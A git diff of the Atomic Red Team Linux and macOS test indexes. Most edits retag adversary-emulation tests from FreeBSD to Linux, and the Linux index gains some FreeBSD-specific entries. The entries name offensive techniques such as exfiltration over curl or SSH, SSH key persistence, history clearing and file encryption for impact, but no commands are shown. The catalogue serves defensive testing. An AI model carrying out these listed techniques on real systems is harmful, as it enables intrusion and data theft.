macos] - Atomic Test #25: Linux List Kernel Modules [linux] + - Atomic Test #26: FreeBSD List Kernel Modules [linux] - T1010 Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1497.003 Time Based Evasion [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1217 Browser Bookmark Discovery](../../T1217/T1217.md) - - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [freebsd, linux] + - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux [linux] + - Atomic Test #4: List Google Chromium Bookmark JSON Files on FreeBSD [linux] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - Atomic Test #3: System Network Configuration Discovery [macos, linux] + - Atomic Test #4: System Network Configuration Discovery (freebsd) [linux] - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1083 File and Directory Discovery](../../T1083/T1083.md) - - Atomic Test #3: Nix File and Directory Discovery [freebsd, macos, linux] - - Atomic Test #4: Nix File and Directory Discovery 2 [freebsd, macos, linux] + - Atomic Test #3: Nix File and Directory Discovery [linux, macos] + - Atomic Test #4: Nix File and Directory Discovery 2 [linux, macos] - [T1049 System Network Connections Discovery](../../T1049/T1049.md) - - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [freebsd, linux, macos] + - Atomic Test #3: System Network Connections Discovery FreeBSD, Linux & MacOS [linux, macos] - T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1057 Process Discovery](../../T1057/T1057.md) - - Atomic Test #1: Process Discovery - ps [freebsd, linux, macos] + - Atomic Test #1: Process Discovery - ps [linux, macos] - T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) - - Atomic Test #1: Permission Groups Discovery (Local) [freebsd, macos, linux] + - Atomic Test #1: Permission Groups Discovery 
(Local) [linux, macos] - [T1201 Password Policy Discovery](../../T1201/T1201.md) - Atomic Test #1: Examine password complexity policy - Ubuntu [linux] + - Atomic Test #2: Examine password complexity policy - FreeBSD [linux] - Atomic Test #3: Examine password complexity policy - CentOS/RHEL 7.x [linux] - Atomic Test #4: Examine password complexity policy - CentOS/RHEL 6.x [linux] - Atomic Test #5: Examine password expiration policy - All Linux [linux] - [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) - - Atomic Test #3: Discover System Language with locale [freebsd, linux] + - Atomic Test #3: Discover System Language with locale [linux] - Atomic Test #4: Discover System Language with localectl [linux] - Atomic Test #5: Discover System Language by locale file [linux] - - Atomic Test #6: Discover System Language by Environment Variable Query [freebsd, linux] + - Atomic Test #6: Discover System Language by Environment Variable Query [linux] - T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) - Atomic Test #4: Security Software Discovery - ps (Linux) [linux] + - Atomic Test #5: Security Software Discovery - pgrep (FreeBSD) [linux] - [T1018 Remote System Discovery](../../T1018/T1018.md) - - Atomic Test #6: Remote System Discovery - arp nix [freebsd, linux, macos] - - Atomic Test #7: Remote System Discovery - sweep [freebsd, linux, macos] + - Atomic Test #6: Remote System Discovery - arp nix [linux, macos] + - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - Atomic Test #12: Remote System Discovery - ip neighbour [linux] - Atomic Test #13: Remote System Discovery - ip route [linux] + - Atomic Test #14: Remote System Discovery - netstat [linux] - Atomic Test #15: Remote System Discovery - ip tcp_metrics [linux] - [T1046 Network Service 
Discovery](../../T1046/T1046.md) - Atomic Test #1: Port Scan [linux, macos] - Atomic Test #2: Port Scan Nmap [linux, macos] + - Atomic Test #3: Port Scan Nmap for FreeBSD [linux] - T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -662,38 +765,41 @@ - [T1531 Account Access Removal](../../T1531/T1531.md) - Atomic Test #4: Change User Password via passwd [macos, linux] - [T1486 Data Encrypted for Impact](../../T1486/T1486.md) - - Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [freebsd, linux] - - Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [freebsd, linux] + - Atomic Test #1: Encrypt files using gpg (FreeBSD/Linux) [linux] + - Atomic Test #2: Encrypt files using 7z (FreeBSD/Linux) [linux] + - Atomic Test #3: Encrypt files using ccrypt (FreeBSD/Linux) [linux] + - Atomic Test #4: Encrypt files using openssl (FreeBSD/Linux) [linux] - T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1494 Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1493 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1496 Resource Hijacking](../../T1496/T1496.md) - - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [freebsd, macos, linux] + - Atomic Test #1: FreeBSD/macOS/Linux - Simulate CPU Load with Yes [linux, macos] - T1565.002 Transmitted Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1485 Data Destruction](../../T1485/T1485.md) - - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [freebsd, linux, macos] + - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1495 Firmware Corruption 
[CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1561.001 Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [freebsd, macos, linux] - - Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [freebsd, linux] + - Atomic Test #3: Restart System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #4: Shutdown System via `shutdown` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #5: Restart System via `reboot` - FreeBSD/macOS/Linux [linux, macos] + - Atomic Test #6: Shutdown System via `halt` - FreeBSD/Linux [linux] + - Atomic Test #7: Reboot System via `halt` - FreeBSD [linux] - Atomic Test #8: Reboot System via `halt` - Linux [linux] - - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [freebsd, linux] + - Atomic Test #9: Shutdown System via `poweroff` - FreeBSD/Linux [linux] + - Atomic Test #10: Reboot System via `poweroff` - FreeBSD [linux] - Atomic Test #11: Reboot System via `poweroff` - Linux [linux] # execution - T1059.007 Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1204.002 User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) - - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux] + - Atomic Test #1: Cron - Replace crontab with referenced file [linux, 
macos] - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux] + - Atomic Test #3: Cron - Add script to /etc/cron.d folder [linux] - Atomic Test #4: Cron - Add script to /var/spool/cron/crontabs/ folder [linux] - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -709,34 +815,39 @@ - Atomic Test #3: Create a system level transient systemd service and timer [linux] - T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.004 Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) - - Atomic Test #1: Create and Execute Bash Shell Script [freebsd, linux, macos] - - Atomic Test #2: Command-Line Interface [freebsd, linux, macos] + - Atomic Test #1: Create and Execute Bash Shell Script [linux, macos] + - Atomic Test #2: Command-Line Interface [linux, macos] - Atomic Test #3: Harvest SUID executable files [linux] - Atomic Test #4: LinEnum tool execution [linux] - - Atomic Test #5: New script file in the tmp directory [freebsd, linux] - - Atomic Test #6: What shell is running [freebsd, linux] - - Atomic Test #7: What shells are available [freebsd, linux] - - Atomic Test #8: Command line scripts [freebsd, linux] + - Atomic Test #5: New script file in the tmp directory [linux] + - Atomic Test #6: What shell is running [linux] + - Atomic Test #7: What shells are available [linux] + - Atomic Test #8: Command line scripts [linux] - Atomic Test #9: Obfuscated command line scripts [linux] + - Atomic Test #10: Obfuscated command line scripts (freebsd) [linux] - Atomic Test #11: Change login shell [linux] + - Atomic Test #12: Change login shell (freebsd) [linux] - Atomic Test #13: Environment variable scripts [linux] + - Atomic Test #14: Environment variable scripts (freebsd) [linux] - Atomic Test #15: Detecting pipe-to-shell [linux] + - Atomic Test #16: Detecting pipe-to-shell (freebsd) [linux] - Atomic Test #17: Current kernel information enumeration [linux] - T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1203 Exploitation for Client Execution [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1059.006 Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) - - Atomic Test #1: Execute shell script via python's command mode arguement [freebsd, linux] - - Atomic Test #2: Execute Python via scripts [freebsd, linux] - - Atomic Test #3: Execute Python via Python executables [freebsd, linux] - - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [freebsd, linux] + - Atomic Test #1: Execute shell script via python's command mode arguement [linux] + - Atomic Test #2: Execute Python via scripts [linux] + - Atomic Test #3: Execute Python via Python executables [linux] + - Atomic Test #4: Python pty module and spawn function used to spawn sh or bash [linux] - T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1059.005 Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md) - Atomic Test #2: At - Schedule a job [linux] + - Atomic Test #3: At - Schedule a job freebsd [linux] # initial-access - T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -760,8 +871,11 @@ - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) - Atomic Test #8: Create local account (Linux) [linux] + - Atomic Test #9: Create local account (FreeBSD) [linux] - Atomic Test #10: Reactivate a locked/expired account (Linux) [linux] + - Atomic Test #11: Reactivate a locked/expired account (FreeBSD) [linux] - Atomic Test #12: Login as nobody (Linux) [linux] + - Atomic Test #13: Login as nobody (freebsd) [linux] # exfiltration - T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -772,21 +886,22 @@ - T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.002 Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) - - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux, freebsd] + - Atomic Test #2: Exfiltrate data HTTPS using curl freebsd,linux or macos [macos, linux] - T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] - - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux, freebsd] + - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux] + - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux] - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1002 Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1030 Data Transfer Size Limits](../../T1030/T1030.md) - - Atomic Test #1: Data Transfer Size Limits [macos, linux, freebsd] + - Atomic Test #1: Data Transfer Size Limits [macos, linux] - T1022 Data Encrypted [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) - - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux, freebsd] - - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [freebsd, linux] + - Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux] + - Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux] - Atomic Test #8: Python3 http.server [linux] + - Atomic Test #9: Python3 http.server (freebsd) [linux] diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 2a38261e2a..4e5339a797 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md 
@@ -8,13 +8,13 @@ - T1556.003 Modify Authentication Process: Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1148 HISTCONTROL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1222.002 File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) - - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [freebsd, macos, linux] - - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [freebsd, macos, linux] - - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [freebsd, macos, linux] - - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [freebsd, macos, linux] + - Atomic Test #1: chmod - Change file or folder mode (numeric mode) [linux, macos] + - Atomic Test #2: chmod - Change file or folder mode (symbolic mode) [linux, macos] + - Atomic Test #3: chmod - Change file or folder mode (numeric mode) recursively [linux, macos] + - Atomic Test #4: chmod - Change file or folder mode (symbolic mode) recursively [linux, macos] - Atomic Test #5: chown - Change file or folder ownership and group [macos, linux] - Atomic Test #6: chown - Change file or folder ownership and group recursively [macos, linux] - - Atomic Test #7: chown - Change file or folder mode ownership only [freebsd, macos, linux] + - Atomic Test #7: chown - Change file or folder mode ownership only [linux, macos] - Atomic Test #8: chown - Change file or folder ownership recursively [macos, linux] - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] - Atomic Test #11: Chmod through c script [macos, linux] 
@@ -28,7 +28,7 @@ - Atomic Test #5: Disable tty_tickets for sudo caching [macos, linux] - T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) - - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux, freebsd] + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) @@ -60,10 +60,10 @@ - Atomic Test #13: Clear and Disable Bash History Logging [linux, macos] - Atomic Test #14: Use Space Before Command to Avoid Logging to History [linux, macos] - [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md) - - Atomic Test #3: Base64 decoding with Python [freebsd, linux, macos] - - Atomic Test #4: Base64 decoding with Perl [freebsd, linux, macos] + - Atomic Test #3: Base64 decoding with Python [linux, macos] + - Atomic Test #4: Base64 decoding with Perl [linux, macos] - Atomic Test #5: Base64 decoding with shell utilities [linux, macos] - - Atomic Test #8: Hex decoding with shell utilities [freebsd, linux, macos] + - Atomic Test #8: Hex decoding with shell utilities [linux, macos] - Atomic Test #9: Linux Base64 Encoded Shebang in CLI [linux, macos] - Atomic Test #10: XOR decoding and command execution using Python [linux, macos] - T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) 
@@ -75,10 +75,10 @@
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- - Atomic Test #1: Set a file's access timestamp [freebsd, linux, macos]
- - Atomic Test #2: Set a file's modification timestamp [freebsd, linux, macos]
- - Atomic Test #3: Set a file's creation timestamp [freebsd, linux, macos]
- - Atomic Test #4: Modify file timestamps using reference file [freebsd, linux, macos]
+ - Atomic Test #1: Set a file's access timestamp [linux, macos]
+ - Atomic Test #2: Set a file's modification timestamp [linux, macos]
+ - Atomic Test #3: Set a file's creation timestamp [linux, macos]
+ - Atomic Test #4: Modify file timestamps using reference file [linux, macos]
 - T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -87,8 +87,8 @@
 - T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [freebsd, macos, linux]
- - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [freebsd, macos, linux]
+ - Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [linux, macos]
+ - Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [linux, macos]
 - [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
 - Atomic Test #3: Enable Guest Account on macOS [macos]
 - [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
@@ -148,9 +148,9 @@
 - [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
 - Atomic Test #4: Install root CA on macOS [macos]
 - [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- - Atomic Test #3: C compile [freebsd, linux, macos]
- - Atomic Test #4: CC compile [freebsd, linux, macos]
- - Atomic Test #5: Go compile [freebsd, linux, macos]
+ - Atomic Test #3: C compile [linux, macos]
+ - Atomic Test #4: CC compile [linux, macos]
+ - Atomic Test #5: Go compile [linux, macos]
 - T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1147 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -161,8 +161,8 @@
 - T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [freebsd, linux, macos]
- - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [freebsd, linux, macos]
+ - Atomic Test #1: Delete a single file - FreeBSD/Linux/macOS [linux, macos]
+ - Atomic Test #2: Delete an entire folder - FreeBSD/Linux/macOS [linux, macos]
 - T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
 - Atomic Test #3: Binary simply packed by UPX [macos]
@@ -174,7 +174,7 @@
 - Atomic Test #1: Space After Filename (Manual) [macos]
 - Atomic Test #2: Space After Filename [macos, linux]
 - [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- - Atomic Test #1: Create a hidden file in a hidden directory [freebsd, linux, macos]
+ - Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
 - Atomic Test #2: Mac Hidden file [macos]
 - Atomic Test #5: Hidden files [macos]
 - Atomic Test #6: Hide a Directory [macos]
@@ -203,15 +203,15 @@
 - T1163 Rc.common [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- - Atomic Test #1: Cron - Replace crontab with referenced file [freebsd, macos, linux]
+ - Atomic Test #1: Cron - Replace crontab with referenced file [linux, macos]
 - Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
 - T1165 Startup Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1162 Login Item [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1176 Browser Extensions](../../T1176/T1176.md)
- - Atomic Test #1: Chrome/Chromium (Developer Mode) [freebsd, linux, windows, macos]
- - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [freebsd, linux, windows, macos]
- - Atomic Test #3: Firefox [freebsd, linux, windows, macos]
+ - Atomic Test #1: Chrome/Chromium (Developer Mode) [linux, windows, macos]
+ - Atomic Test #2: Chrome/Chromium (Chrome Web Store) [linux, windows, macos]
+ - Atomic Test #3: Firefox [linux, windows, macos]
 - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
 - [T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac)](../../T1037.002/T1037.002.md)
 - Atomic Test #1: Logon Scripts - Mac [macos]
@@ -233,7 +233,7 @@
 - T1164 Re-opened Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- - Atomic Test #1: Modify SSH Authorized Keys [freebsd, macos, linux]
+ - Atomic Test #1: Modify SSH Authorized Keys [linux, macos]
 - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -323,7 +323,7 @@
 - Atomic Test #4: Tor Proxy Usage - MacOS [macos]
 - T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1571 Non-Standard Port](../../T1571/T1571.md)
- - Atomic Test #2: Testing usage of uncommonly used port [freebsd, linux, macos]
+ - Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
 - T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -334,19 +334,19 @@
 - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- - Atomic Test #3: Malicious User Agents - Nix [freebsd, linux, macos]
+ - Atomic Test #3: Malicious User Agents - Nix [linux, macos]
 - [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- - Atomic Test #1: rsync remote file copy (push) [freebsd, linux, macos]
- - Atomic Test #2: rsync remote file copy (pull) [freebsd, linux, macos]
- - Atomic Test #3: scp remote file copy (push) [freebsd, linux, macos]
- - Atomic Test #4: scp remote file copy (pull) [freebsd, linux, macos]
- - Atomic Test #5: sftp remote file copy (push) [freebsd, linux, macos]
- - Atomic Test #6: sftp remote file copy (pull) [freebsd, linux, macos]
- - Atomic Test #14: whois file download [freebsd, linux, macos]
+ - Atomic Test #1: rsync remote file copy (push) [linux, macos]
+ - Atomic Test #2: rsync remote file copy (pull) [linux, macos]
+ - Atomic Test #3: scp remote file copy (push) [linux, macos]
+ - Atomic Test #4: scp remote file copy (pull) [linux, macos]
+ - Atomic Test #5: sftp remote file copy (push) [linux, macos]
+ - Atomic Test #6: sftp remote file copy (pull) [linux, macos]
+ - Atomic Test #14: whois file download [linux, macos]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- - Atomic Test #1: Connection Proxy [freebsd, macos, linux]
+ - Atomic Test #1: Connection Proxy [linux, macos]
 - Atomic Test #2: Connection Proxy for macOS UI [macos]
 - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -356,9 +356,9 @@
 # collection
 - [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
 - Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- - Atomic Test #6: Data Compressed - nix - gzip Single File [freebsd, linux, macos]
- - Atomic Test #7: Data Compressed - nix - tar Folder or File [freebsd, linux, macos]
- - Atomic Test #8: Data Encrypted with zip and gpg symmetric [freebsd, macos, linux]
+ - Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
+ - Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
+ - Atomic Test #8: Data Encrypted with zip and gpg symmetric [linux, macos]
 - Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
